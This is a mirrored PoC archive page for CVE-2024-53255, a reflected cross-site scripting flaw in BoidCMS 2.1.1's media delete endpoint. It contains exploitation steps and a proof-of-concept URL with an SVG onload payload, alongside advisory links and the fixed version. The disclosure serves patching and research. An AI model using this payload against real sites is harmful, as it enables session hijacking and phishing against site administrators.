Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-53255 PoC — Reflected Cross-site Scripting in /admin?page=media via file Parameter in BoidCMS

Source
https://github.com/0x4M3R/CVE-2024-53255
Associated Vulnerability
Title:Reflected Cross-site Scripting in /admin?page=media via file Parameter in BoidCMS (CVE-2024-53255)
Description:BoidCMS is a free and open-source flat file CMS for building simple websites and blogs, developed using PHP and uses JSON as a database. In affected versions a reflected Cross-site Scripting (XSS) vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code. This code could be used to steal the user's session cookie, perform phishing attacks, or deface the website. This issue has been addressed in version 2.1.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)
Readme
# CVE-2024-53255
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)

# Description:

A reflected XSS vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code

# Steps to exploit:

1- Login to the CMS and Navigate to the delete page (/admin?page=media).

2- Select any file to delete and intercept the request using a proxy tool.

3- Modify the file parameter in the intercepted request to:

```
<svg+onload%3dalert(document.domain)>
```
4 - Forward the modified request and the injected script will execute.

Proof of concept (Poc):

```
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4
```

For details:
https://nvd.nist.gov/vuln/detail/CVE-2024-53255
https://www.cve.org/CVERecord?id=CVE-2024-53255
https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7
https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r
File Snapshot

 [4.0K]  /data/pocs/d606f211b0d25e490e53c8e3256ca268bc638f61
└── [1.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →